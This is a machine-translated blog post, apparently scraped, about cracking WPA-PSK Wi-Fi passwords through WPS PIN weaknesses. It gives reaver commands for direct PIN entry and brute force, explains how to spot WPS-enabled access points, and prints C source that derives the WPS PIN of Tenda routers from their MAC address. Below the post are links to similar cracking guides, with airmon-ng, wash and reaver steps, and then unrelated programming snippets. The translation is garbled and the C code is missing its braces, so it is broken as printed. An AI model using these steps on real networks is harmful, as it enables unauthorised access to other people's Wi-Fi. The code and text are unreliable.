I've learned about cracking before WPA-PSK The password is for use only aircreack Toolkit access handshake After hanging dictionary blasting mode , And whether we can crack wpa Passwords depend entirely on dictionary strength . In addition to this way, there is a more effective way , It's using routing PIN Code and then use BT5 I brought it with me Reaver Tools are broken in seconds WPA-PSK password !

In known PIN In the case of code, it can be BT5 Next use reaver -i mon0 -b AP‘s Mac -p pin Direct second break !

Now the more difficult thing is how to get PIN The problem. , Friends who often pay attention to wireless should know that Tengda and Leike products are guaranteed now PIN Algorithmic loopholes , If routing MAC The address is “C83A35” or “00B00C” So you can directly calculate PIN value , And then use PIN Value directly connect or continue to use PIN It's worth adding reaver Crack out wpa-psk.

besides , according to PIN Features can also be used Reaver To exhaust ,pin The yard is a 8 The first four digits are randomly generated and then 4 Is it 3 A number plus 1 individual checksum Greatly reduces the time required for exhaustion .

stay BT5 You can use reaver -i mon0 -b AP's Mac -vv To crack , This process can take many hours , I saw it on the Internet 3-10 Hours , I haven't verified it yet .reaver Progress is also saved in the process (/usr/local/etc/reaver/AP’s MAC.wpc) To the file .

But the use of PIN Methods to crack WPA-PSK There's a limit to passwords , Namely AP It has to be turned on QSS、WPS function ! We can scan AP Judge the target when you're looking for it AP Whether it is turned on QSS、WPS function , As shown in the figure below airodump-ng The scan was in MB At the back of the column is “.” is .

Or in win7 below , Connect AP There is... Under the password input box “ You can also connect by pressing the router button ” The words are also on QSS、wps Of .

“C83A35” or “00B00C” The first route PIN Calculation tool source code , You can compile it yourself :

//Computes PIN code starts with OUI "C83A35" and "00B00C"

//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.

//Coded by Zhaochunsheng - iBeini.com

//Modified by Lingxi - WiFiBETA.COM

#include <stdio.h>

#include <stdlib.h>

#include <stdafx.h>

int main()


unsigned int wps_pin_checksum(unsigned int pin);

int PIN = 0;

//   printf("ComputePIN-C83A35\n");


printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");

printf("type the other six digits, you might be able to get the \n");

printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");

printf("Code by ZhaoChunsheng 04/07/2012 http://www.2cto.com \n\n");

printf("Modified by Lingxi - WiFiBETA.COM\n\n");

//Translated to Chinese

printf(" explain :\n");

printf(" If your wireless router MAC Address to “C83A35” or “00B00C” Lead ,\n");

printf(" Enter the last six digits MAC Address ( Case insensitive ) You may be able to get WPS PIN secret key !\n");

printf(" Good luck !\n\n");

printf(" Written by Zhao Chunsheng in 2012 year 4 month 7 Japan  Http://iBeini.com\n");

printf(" Modified by Lingxi and translated into Chinese  WiFiBETA.COM\n\n");

printf(" Please enter the last six MAC Address (HEX):\n");

printf("Input the last 6 digits of MAC Address(HEX):");

scanf("%x",&PIN);  printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);

printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));

return 0;


unsigned int wps_pin_checksum(unsigned int pin)


unsigned int accum = 0;

while (pin)


accum += 3 * (pin % 10);

pin /= 10;

accum += pin % 10;

pin /= 10;


return (10 - accum % 10) % 10;


Use Reaver Add PIN It's broken in seconds WPA-PSK More about passwords

  1. run PIN Code cracking wireless network WIFI Analysis of the principle of cryptography ( turn )

    Is your home wireless router safe ? Is anyone rubbing the net ? Where are the vulnerabilities in wireless routers ? So avoid rubbing the net ? Want to understand these , You have to understand how encryption works and how it works . Tools / raw material The computer Enough good enough wifi Signal source usb wireless network adapter ( Non essential ) One ...

  2. ubuntu14.04 Use reaver run pin code

    I just said today that there was no support ubuntu14.04 use reaver run pin This is the way to find out ... In addition, install the system ubuntu14.04 And a series of cracking tools like aircrack,minidwep I'm not waiting ...

  3. There's a website that's broken mdb Access password

    http://tools.bugscaner.com/crackmdb/ Website

  4. Wireless security topic _ Cracking 02--kali Crack pin code

    Recently, the project is a little tight , So the article that should have been published last week , By this Wednesday , I'm sorry . Wireless security topic , I'm going to write six parts systematically , They are cracking , Attack , Deception , Routing , Mobile and Bluetooth , Of course, during the release process , It may also be mixed with release f ...

  5. Use Reaver The crack is on WPS Functional wifi password (wpa/wpa2)

    come from wikipeida: Wi-Fi Protection settings ( abbreviation WPS, Full name Wi-Fi Protected Setup) It's a wireless network security standard , The purpose is to simplify the encryption steps for home users when using wireless network . This standard is established by Wi-Fi union (Wi ...

  6. [ original ]K8 In a word, code blasting tools { Second break 10 ten thousand } Support ASP/PHP/ASPX/JSP/CFM/DIY

    Tools : K8_FuckOneShell 20161224 compile : VS2012  C# (.NET Framework v4.0) organization : K8 Base building brigade [K8team] author : K8 Brother bin Laden's blog : http ...

  7. kali Take the router pin code

    Before the order : take pin You can run straight out of the yard WPA PSK, Let's start recording my operation process . Network card monitoring mode airmon-ng start wlan0 scanning wash -i wlan0mon broken pin network card Physical address ...

  8. kali- By getting the router pin Code to get the wireless network password shell Script

    Go straight to the script , I'll take a note . #************************************************************************* # > Fil ...

  9. kali PIN Code cracking

    airmon-ng start wlan0   // Open network card airodump-ng wlan0mon    // Monitor mode , Find open wps Of apreaver -i wlan0mon -b [ap’s m ...

Random recommendation

  1. es6 Learning notes 1 --let as well as const

    let The basic usage of a sentence :  1.let The declared variable is a block level scope , Only in the nearest {} It works inside , If it is referenced externally, an error will be reported . { let a = 10; var b = "hello" } ale ...

  2. Notes :Bmob Cloud code testing APNS Push function # code snippet

    function onRequest(request, response, modules) { var push = modules.oPush; push.send({ "data&qu ...

  3. 1. Please refer to this article for your homework this week :http://www.ruanyifeng.com/blog/2015/12/git-workflow.html Set up the GitHub Version update process --- respondent : Xu Xiaorui

    First , Introduce to you gitflow, It was the first to be born . And it's a widely used workflow . If the git flow Development process , So there are two permanent branches of the project , One is called the main branch master, The other is called the development branch develop.mast ...

  4. Windows Azure Set up virtual machine static extranet IP Address

    Officially, it's called “ Virtual public IP Address reservation ”, To make it easy to understand , We call it static extranet IP Address . If you use the international version at home Windows Azure It is highly recommended to set up IP Address reservation . because Windows Azure ...

  5. POI Introduction to export and import tool class

    Introduce : Apache POI yes Apache Open source project of Software Foundation ,POI Provide API to Java Program pair Microsoft Office Format file reading and writing functions . .NET And developers can take advantage of NPOI (POI ...

  6. Simple and practical vue Customize tab introduction

    This article is based on vue Official documents , Respectively : Dynamic components & Asynchronous component . slot . Get into / Leave & List the transition   Chapter link description If you want to achieve tab Animation , First of all, understand vue Which elements of / Those components are suitable for animation under those conditions ...

  7. With Baidu map API Analysis of traffic big data

    Baidu Maps API, Incomplete documentation , The examples are not detailed . There are not many useful examples on the internet yet . For example, we can't find solutions to the following requirements : 1. How to use Baidu map API Look up the latitude and longitude of a place . 2. How to use Baidu map through a longitude and latitude query quotient ...

  8. JavaEE Web Development link mysql appear Class.not found Error of

    Clearly in the project library It's been introduced mysql-connector.jar My bag , But it's loading driver When eclipse Keep reporting this mistake . The solution is simple , It's the same jar Wrapped in tomcat Installation directory ...

  9. php Pthread Multithreading ( 5、 ... and ) Thread synchronization

    Sometimes we don't want threads to call start() Immediately after that , After processing our business logic, let the thread execute when necessary . <?php class Sync extends Thread { private $na ...

  10. Pycharm And python Install detailed tutorial

    First let's install python 1. First go to the website to download : Click to open the link ( Or enter your own web address https://www.python.org/downloads/), After entering, as shown in the figure below , Select the area in the red circle to download . 2. ...